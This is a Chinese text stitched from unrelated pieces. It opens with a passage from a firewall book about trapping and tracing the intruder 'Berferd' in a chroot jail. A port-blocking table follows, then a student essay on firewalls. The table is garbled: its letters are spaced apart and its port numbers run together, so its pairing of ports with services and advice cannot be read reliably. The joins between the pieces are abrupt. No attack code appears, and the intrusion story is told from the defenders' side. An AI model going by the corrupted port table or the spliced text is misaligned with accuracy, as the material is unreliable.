那天下午，他又工作了一个小时，接下来的一两个星期他仍一次又一次地继续。我们在达拉斯的CNN Usenix继续这种字谜游戏，在这里把B e r f e r d 的命令在终端室里每天仿真两次。尽管响应时间在滥用可信度，但他的信心看起来仍不松懈。

10.5 监狱

我们从不打算用这些工具来实时仿真一个系统。我们想监视黑客的击键，跟踪他，了解其技术，并警告他的受害人。最好的解决办法是将他引诱我们的一台为此牺牲的计算机上并监听其连接。

我们想有一台对黑客来讲是不可见的监视用机器。以太网很容易窃听，修改过的

t c p d u m p 软件能够分离和存储这些会话。我们试过这种方式，发现内核仍把A R P 条目报告给了窃听网络。我们调查了许多软件修补(技术) ，但它们都太复杂以致我们不敢相信它们能完成任务。S t e v e 最后切断了收发器电缆中的传输线，确保其沉默不语和不被发现。

现在有许多窃听和监视工具可用，黑客用它们来搞破坏。我们已拥有这些工具，它

们都是最近被弄到手的。但当我们安装好一台献祭的机器时，B e r f e r d 对其一点不感兴趣。起初，我手头没有多余的机器，因此我采用软件路由。这个方法很麻烦，我不建议大家这样做。

我向当地的U N I X 专家咨询有关c h r o o t 环境的安全。他们的结论是：它不是十分安全的，如果编译器和某些程序丢失，它很难逃脱攻击。同时它也并不是不可探测的，但我估计

B e r f e r d 总是匆匆忙忙，因此大概不会注意到吧。我们构造了一个c h r o o t “监狱”(或“蟑螂汽车旅馆”) ，并通过我们的防火墙机器与它建立了一个有日志记录的连接(见图1 0-1) 。通过这种方案，B e r f e r d 帐号和g u e s t 帐号被连接到了监狱。

外部网关内部网关

监狱日志文件

图10-1 连接到监狱

的时间。

每个会话保留了两个日志，一个用于输入，一个用于输出。日志被标记上了开始和结束

监狱很难设置。我们不得不替监狱用户恰到好处地设置对/ d e v 的访问次数并且修改u t m p 。有几个未处理的原始磁盘文件太危险，因此不能留在附近。我们删去了p s 、w h o 、w 、n e t s t a t ，及其他几个暴露信息的程序。伪造的l o g i n 外壳脚本必须用几种方式对l o g i n 进行仿真(见图1 0-2 ) 。Diana D'Angelo 建立了一个可信的文件系统(这是非常好的系统管理实践) ，并且装载了各种可笑和具有诱惑力的文件。Paul Glick激活了u t m p 的部件。

图10-2 用setupsucker 外壳脚本仿真login ，它非常巧妙。我们必须使环境变量看起来很合理，

并尽量保留监狱自己的特殊的utmp 入口。从黑客的角度，

我们不得不小心地在设置脚本中保留适当的错误

过了一会儿，B e r f e r d 发现了那个监狱，开始在里面四处乱闯。他寻找大量的程序，我们后来才知道这些程序中有他喜欢的安全漏洞。对我们来讲，监狱并不很可靠，但B e r f e r d 似乎觉得我们的网关很奇怪，于是他无可奈何地放弃了。

10.6 跟踪Berferd

B e r f e r d 在我们的监狱中消耗了很多的时间。我们也花费了很多时间与斯坦福的系统管理员Stephen Hansen交谈。S t e p h e n 花了很多时间尽力跟踪。B e r f e r d 正通过斯坦福的一台机器攻击我们。他通过一个终端服务器连接到那些机器，而该终端服务器又连接到另一个终端服务器。他与终端服务器的连接则通过一根电话线实现的。

我们查看了他登录进来的时间以猜测他所处的时区。图1 0-3的简单图表显示了他会话的开始时间( P S T ，太平洋标准时间) 。看起来那是在美国东海岸的睡觉时间，而程序员向来以奇

怪的作息时间而著称。这个分析方法没有太大用途，但值得试一试。

图10-3 Berferd的活动时刻表。这是一张根据时间绘制的原始图。在攻击期

间设置的监视工具常常是仓促上阵并且是不完善的

与B e r f e r d 在斯坦福的战斗本身就是一个完整的故事。B e r f e r d 正在犯故意伤害罪，搅乱很多机器，刺探更多的机器。他从那儿攻击了世界上的许多主机。Tsutomu 修改了t c p d u m p 程序以便为每个数据包提供一个带时间戳的记录。这让他能够重播实时的终端会话。当B e r f e r d 登录进一台新的机器之后的几分钟之内，他们即能阻止其攻击。例如，他们观察到B e r f e r d 使用p s 命令的进程。他的登录名更改为u u c p ，然后在机器显示“出现磁盘错误”之前变成b i n 。这种搭线窃听方式的连接在很多情况下有用，尽管他们不能监视斯坦福的所有网络。

在攻击之初，E i n d h o v e n 大学的Wietse Ve n e m a 与斯坦福的人取得了联系。他在荷兰跟踪黑客行动已有一年多的时间，自信熟知黑客的身份，其中包括B e r f e r d 。

最后，跟踪了几个电话呼叫。他们跟踪回到华盛顿，然后是葡萄牙，最后到达荷兰。荷兰电话公司拒绝继续跟踪呼叫，因为在那儿黑客行为是合法的且没有相应的条约(一个条约需要行政机关缔结并经美国参议院批准，这对于我们想做的事来说，有点远了) 。

一年之后，同一个家伙破坏了荷兰的一些计算机。突然间，地方当局发现了一些

相关的可应用的法律。从此之后，荷兰电话公司通过了一些新的法律，禁止黑客行为。几个月来，B e r f e r d 以斯坦福作为基地活动。记录他的活动的日志有几十兆字节。对这种非常乏味的刺探计算机行为，B e r f e r d 很有耐心。一旦他在某台机器上得到一个帐号，对系统管理员来说就只有绝望了。B e r f e r d 有一个全面的安全漏洞列表。他知道隐蔽的s e n d m a i l 参数并用得很精。(是的，一些s e n d m a i l 对登录用户也有安全漏洞。为什么如此大而复杂的程序允

许以r o o t 的身份运行？) 他搜集有完全被攻入的计算机的记录，连同通常存储在/ u s r /l i b /t e r m /. s 下的s e t u i d -t o -r o o t 外壳脚本程序。你肯定不想在你的计算机上给他一个帐号。

10.7 Berferd回家了

在1 991年4月2 1日(星期日) 的《纽约时报》上，John Markoff揭露了一些B e r f e r d 的故事。他说官方曾经追赶过几个荷兰的黑客，但无法起诉他们，因为根据荷兰法律，黑客行为不是非法行为。

黑客们在一天左右就得知了这篇文章。Wi e t s e 收集了一些荷兰黑客成员之间的邮件。显然，他们已经购买了描写我们机器崩溃的故事。B e r f e r d 的一个朋友对《纽约时报》没有把我们的计算机包括在那些被损坏机器的列表中感到奇怪。

5月1日，B e r f e r d 登录到那台监狱(计算机) 。根据他用来四处查看和攻击时所使用的命令以及击键速度和错误，我们认出了他。他刺探各种计算机，包括通过资询网络w h o i s 服务寻找某些品牌的主机和新的目标机器。

他的试探从我们的监狱机开始，但他并没有攻入任何机器。在被攻击的几百个站点中，三个站点注意到了这种企图，随之而来的是板着面孔的安全官员的电话。我向他们解释说，就我们迄今所知，黑客在法律上是不可侵犯的，我们能做的最好一点是记录下他们的行为，并给受害者提供记录。B e r f e r d 有很多发起连接的基地。只有靠耐心和幸运才能记录到他所有的行为。

一个遭到攻击的计算机系统管理员，喜欢利用破译者的攻击日志记录去进行模糊的推理吗？只有知道了实际损失，才能方便地进行故障控制。如果一个系统管理员没有日志，他或她应通过发布的磁带或C D -R O M 重新加载受到危害的系统。

遭攻击的目标站点的系统管理员和他们的管理层很同意我的观点，并要求我们保持监狱机的开放状态。

在我们的管理层的要求下，我于5月3日关闭了监狱机。B e r f e r d 试了几次想到达监狱机，最后他离开了，并把他的操作转移到瑞典的一台被入侵的计算机。

我们没有正当的手段影响和阻止B e r f e r d 。事实上，我们很幸运能知道他是谁，绝

大多数系统管理员则根本无法知道是谁攻击了他们的机器。

当Wietse Venema打电话给其中一个黑客的母亲后，他的朋友最终才逐渐收敛。

还有其他的问题也是事后才逐渐明朗起来的。首先和首要的是，我们事先不知道

如何对待黑客。我们走一步看一步，根据经验作出决策。一个关键的决策是让B e r f e r d 通过监狱机使用我们的一部分机器，但管理层并不支持我们这样做。

我们也有几种工具。我们用的脚本程序和监狱机本身都是现创建的。如果B e r f e r d

比较警觉，他一定可以发现我们的一些错误，甚至还有一些警告他的东西。想监视黑客的站点应事先准备好黑客工具箱，其中包括购买任何必要的硬件。

事实上，我们事先所做的唯一的准备是设置日志监视器。简而言之，我们尚未准

备好。你呢？

防火墙与因特网安全016

端口8 78 8

协议T C P U D P

服务名l i n k k e r b e r o s

(续)

描述

除了黑客，很少有人使用。一个理想的报警端口

官方的K e r b e r o s 端口。如果允许其他用户登录进你的站点，无论是直接地或通过域间鉴别，都必须开放此端口；否则阻塞之(参见1 3. 2节) 。对原有K e r b e r o s 端口7 50也同样如此。对现在使用的及原来的口令修改端口7 49和7 51也应阻塞，尽管用于受K e r b e r o s 保护的端口可能是安全的

9 51 0911 011111 311 91 231 441 611 621 775 125 135 145 155 125 135 145 175 185 205 401 025

T C P T C P T C P U D P , T C P T C P T C P U D P T C P U D P U D P U D P T C P T C P T C P T C P U D P U D P U D P U D P U D P U D P T C P T C P

s u p d u p p o p -2p o p -3s u n r p c a u t h n n t p n t p N e W S s n m p s n m p -t r a p x d m c p e x e c l o g i n s h e l l p r i n t e r b i f f w h o s y s l o g t a l k n t a l k r o u t e u u c p l i s t e n e r

除了黑客，很少有人使用。另一个理想的报警端口除非用户希望从外部读取邮件，否则阻塞同上

阻塞它，但记住攻击者能扫描你的端口号空间(参见2 . 5. 1节) 一般是安全的。如果阻塞它，则不发送I C M P 拒绝信息(参见7 . 3节)

如果允许从这个端口接收数据，则使用源地址和目的地址过滤器(参见2 . 8. 2节)

如果使用N T P 自身的访问控制，则是安全的(参见2 . 4. 3节) 一个窗口系统。如果希望用X 11，则阻塞阻塞

阻塞，除非要监视网络外部的路由器用于X 11登录。当然要阻塞

阻塞。当使用r c p 时可能有用；到目前为止，只有因特网蠕虫病毒使用过它。而且，它不作任何日志记录危险。阻塞(参见2 . 7节)

双倍危险。它也不作任何日志记录，阻塞(参见2 . 7节) 这里时常出现问题，而且也没有足够理由让局外人使用你的打印机。阻塞

阻塞，这是一个漏洞百出且危险的服务

不应该在这个端口上合法地获得任何东西，阻塞

且不说安全漏洞(并且确实有一些) ，如果开放这个端口，日志将受到攻击。阻塞(参见6 . 2节)

阻塞，实际协议激活随机T C P 端口之间的一个会话同上

阻塞，不要让局外人同你的路由表玩游戏(参见2 . 2节) 历来就是一个危险的端口，在因特网上完全过时。阻塞通常用作S V R 3的侦听者端口。是一个极坏的选择。如果你的系统是这样，或者改变侦听端口(本地选择) ，或者确保阻塞使用这个端口的对内调用；确保只有对外调用使用它

2 0002 0492 7666 000~6x x x 6 667

T C P U D P T C P T C P T C P

o p e n w i n n f s l i s t e n x 11I R C

与X 11相似。阻塞阻塞，绝不犹豫

系统V 的侦听程序。与t c p m u x 类似，但有更多服务。阻塞阻塞X 11的所有端口(参见2 . 9节, 3. 3. 3节)

阻塞。I R C 本质上或许有或许没有安全危险(尽管I R C 客户程序有一些危险的选项) ，但是，有些信道至少要吸引那些发送ICMP Destination Unreachable报文的用户

B.2 Mbone用途

一些旧的多址传输实现都使用固定的端口号。它们和特定的多址传输地址绑在一起。按照习惯，I E T F 会议和其他网络相关会议都使用一定的多址传输端口和地址。

服

s d v a t

务

地

址

端

口

应

用

2 24. 2. 127. 2552 24. 2. 0. 1

9 8763 4563 457

数据“会话”信息

n v i v s

2 24. 2. 1. 12 24. 8. 8. 8

4 4442 2322 2332 234

视频声频控制

IETE chan 1 audio (GSM)IETE chan 2 audio (GSM)IETF chan 1 audio (PCM)IETF chan 2 audio (PCM)IETF chan 1 vedeo IETF chan 2 vedeo

2 24. 0. 1. 102 24. 0. 1. 132 24. 0. 1. 112 24. 0. 1. 142 24. 0. 1. 122 24. 0. 1. 15

4 1004 1014 1304 1314 11 04 1114 1404 1414 4444 444

关于防火墙的论文

浅论防火墙

----------11632135吴凯 随着计算机网络不断的深入人们的生活中去，计算机网络的安全也就成了一个很重要的因素，为了阻止一些不法分子对网络安全的危害，于是有了防火前这个概念，

第一代的防火墙生是和路由器差不多同时存在的，采用的是包过滤技术，这也体现了防火墙对网络的安全重要性，路由器是网络形成的标志，而防火墙就在这个时候出现，就像一个国家的开国的同时，往往会有法律的出现，1989年出现了第二代防火墙，即在电路层上设定防火墙，我觉得这层上设定的好处是简单方便，但是不稳定，可调控性差，于是后来有了应用防火墙这种方式将逐步脱离物理的控制。1992年usc信息科学院推出了状态监视技术，以及1998年Nai推出可自适应代理技术。这就说明了随着网络的不断被应用，标志着网络安全的防火墙也在不断被完善。

防火墙系统通过访问规则决定哪些内部服务可以被外界访问、外界的哪些人可以访问内部的哪些可以访问的服务以及哪些外部服务可以被内部人员访问。要使一个防火墙有效，所有来往的因特网的信息都必须经过防火墙，接受防火墙的检查。防火墙必须只允许授权的数据通过，并且防火墙本身也必须免于渗透。防火墙系统一旦被攻击者突破或迂回，就不能提供任何保护了。一个好的防火墙系统应具有三方面的特性：(1)所有在内部网络和外部网络之间传输的数据必须通过防火墙：(2)只有被授权的合法数据可以通过防火墙；(3)防火墙

本身不受各种攻击的影响。

随着无线联网技术的发展．人们可以随时随地地接入网络。无论是出差在外还是下班回家，都可以方便地接入公司网络进行数据访问和计算。在带来方便的同时，移动计算给网络安全也带来了新的麻烦。如何处理这些随时变化的网络结构并保证安全的访问，是防火墙面临的新问题。

可以预见，未来防火墙的发展趋势是朝高速、多功能化、更安全的方向发展。

1.高速

随着人们对防火墙的越来越依赖，对其要求也越来越高，随着我们队它的了解，可以预见的是防火墙将越来越快，它的处理速度，等都将逐步实现人们的需求。

2 多功能化

多功能也是防火墙的发展方向之一，鉴于目前路由器和防火墙价格都比较高，网络环境也越来越复杂，一般用户总希望防火墙可以支持更多的功能，满足自身的需要。例如，防火墙支持广域网口，并不影响安全性，但在某些情况下却可以为用户节省一台路由器; 支持部分路由器协议，如路由、拨号等，可以更好地满足组网需要； 3安全

未来防火墙的操作系统会更安全。随着计算机网络的发展，防火墙会更多地参与应用层分析，为应用提供更安全的保障。“魔高一尺，道高一丈”，在信息安全的发展与对抗过程中，防火墙的技术一定会

不断更新，日新月异，在信息安全的防御体系中，起到堡垒的作用。

1.1、软件防火的工作原理和实质

除个人用户使用的防火墙大部分是NIPS（网络入侵防御系统，俗称网络防火墙），现在的NIPS网络防火墙可分为病毒库型防火墙和行为跟踪型防火墙，行为跟踪型防火墙，这类防火墙没有病毒库，因而体积小且内存占用少，有些防火墙甚至连更新功能都没有，即使是有更新功能的，也只是修复防火墙的漏洞或发布新版本时进行版本升级

1.2、硬件防火墙的工作原理和实质

硬件防火墙其实本身也属于NIPS，但与软件防火墙不同，硬件防火墙所要拦截的对象都是出厂时编制好的，也就是相当于软件网络防火墙里面的行为跟踪型，不过硬件防火墙不相软件防火墙那样能够设置应用程序规则，所以实际上硬件防火墙是个只具备传入流量保护的行为跟踪型NIPS网络防火墙。

其实我觉得软件防火墙和硬件防火墙没什么太大区别，度是为了网络安全所设定的一种方式，只要我们平时规范用网。文明上网，自己提高防范意识，网络还是可以带来很多有利的影响的。

转载请注明出处范文大全网 » 关于防火墙